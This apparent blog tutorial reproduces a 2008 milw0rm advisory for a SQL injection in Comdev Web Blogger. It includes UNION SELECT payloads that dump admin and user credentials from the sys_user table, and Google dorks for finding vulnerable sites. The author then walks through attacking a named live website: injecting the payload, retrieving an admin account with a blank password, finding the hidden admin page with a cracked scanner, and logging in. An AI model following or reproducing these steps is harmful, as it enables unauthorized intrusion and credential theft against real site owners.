Today we are going to learn the web applications part of milw0rm.com
so
lets go to Milw0rm shall we
Now go to web applications
and you see a whole lot of stuff right were gonna look for sql injection vulnerability.
I found this
right here
and it show you the following
Code:
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_100$2008
-----------------------------------------------------------------------------------------
[ECHO_ADV_100$2008] Comdev Web Blogger <= 4.1.3 (arcmonth) Sql Injection Vulnerability ----------------------------------------------------------------------------------------- Author : M.Hasran Addahroni Date : July, 14 th 2008 Location : Jakarta, Indonesia Web : http://e-rdc.org/v1/news.php?readmore=102
Critical Lvl : Medium
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Comdev Web Blogger
version : <= 4.1.3 Vendor : http://www.comdevweb.com/blogger.php
Description :
Comdev Web Blogger is your voice and also allows others to give you feedback on a post-by-post basis.
Site members can now create, manage, upload photos to their own blogs.FEATURES: Non Template-Based Gives You Flexibility to Fit
the Web Blogger to Your Web Design Page • Multiple user accounts to create & invite friends to their own blogs • Hot Blogs,
Latest Blogs • RSS News Feeds • Blogs Categorisation • Hot Blogs & Latest Blogs • Search Blogs • Mini Calendar • Monthly Archive•
Links to Friends' Blog • Public or Friends View Only Blogs • Set Post Comments Permission • Friends Login • Forms Submission with
CAPTCHA Image Verification • WYSIWYG Editor for Blog & Comment • Notify Friends of New Blog • Set View & Post Comment Permissions •
sSet Date & Time Format • Local Time Zone • Pre-defined Front-end CSS • Personalized Emails & Auto-Responders •
Installation Support available
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~
Input passed to the "arcmonth" parameter in blog's page is not properly verified before being used
in an sql query.
This can be exploited thru the browser to manipulate SQL queries and pull the username and password
from admin and users in plain text. Successful exploitation requires that "magic_quotes" is off.
Poc/Exploit:
~~~~~~~~~
http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,passwo rd),3,4,5,6%20from%20sys_user--
http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20 from%20sys_user/*
Admin Login at http://www.example.com/[PATH]/oneadmin/
Dork:
~~~~
Google : "Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth"
Solution:
~~~~~~
- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini
Timeline:
~~~~~~~~
- 11 - 07 - 2008 bug found
- 11 - 07 - 2008 vendor contacted
- 14 - 07 - 2008 advisory released
---------------------------------------------------------------------------
Shoutz:
~~~~
~ ping - my dearest wife "happy birthday darling", zautha - my beloved son
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,negative,
the_hydra,neng chika, str0ke
~ everybody [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cyb ertank,
super_temon, b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ dr188le,SinChan,h4ntu,cow_1seng,poniman_coy,paman_ gembul,ketut,rizal,cR4SH3R,
kuntua, stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~
K-159 || echo|staff || eufrato[at]gmail[dot]com
Homepage: http://www.e-rdc.org/
-------------------------------- [ EOF ] ----------------------------------
# milw0rm.com [2008-07-15]
Code:
http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,passwo rd),3,4,5,6%20from%20sys_user--
http://www.example.com/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20 from%20sys_user/*
This is the sql injection into the site
there are 2 separate ones and under that is the DORK:
Code:
Powered by Comdev Web Blogger" or allinurl:".php?domain= arcyear=2007 arcmonth
and the search engine will give you a list of websites that power by that
so go into your search engine and paste that
or type
Code:
allinurl:".php?domain= arcyear=2007 arcmonth
so the website we are going to use is listed below
[IMG]file:///C:/DOCUME%7E1/gadow/LOCALS%7E1/Temp/moz-screenshot.jpg[/IMG]
Code:
[IMG]file:///C:/DOCUME%7E1/gadow/LOCALS%7E1/Temp/moz-screenshot-1.jpg[/IMG]http://uhrionline.org/blog.php?domai...07&arcmonth=10
now once you are at that site get the sql injection code and paste it in the url so it will look like this
then hit enter
u see the admin username and password along with other users as well that password is encrypted so user john the ripper or cain and abel to decrypt it.. in this case it is unencrypted and there is NO PW (WTF LOL)
and then you will have to find the admin login page i would 1. go through every link right click view source and look for a admin login page if its not there get the cracked version of acunetix and scan that website and it will show you the admin page
then you can just login and do whatever you want
now what i did was sql inject the site and it gave me the following
admin::
anyways Milw0rm said look for /oneadmin
well oneadmin does not exist..
so then we go through every link looking at the source code looking for a login page didn't find one my last step was to scan the site with all of its links
After scanning I came up with
Code:
http://www.uhrionline.org/oadmin/index.php?
so now we log in :P
with the un admin and pw is blank
and get this
0 commentaires
Post a Comment
If you enjoyed this post, please consider leaving a comment or
Subscribe to ChamsBlog via RSS
Subscribe to chamsblog by Email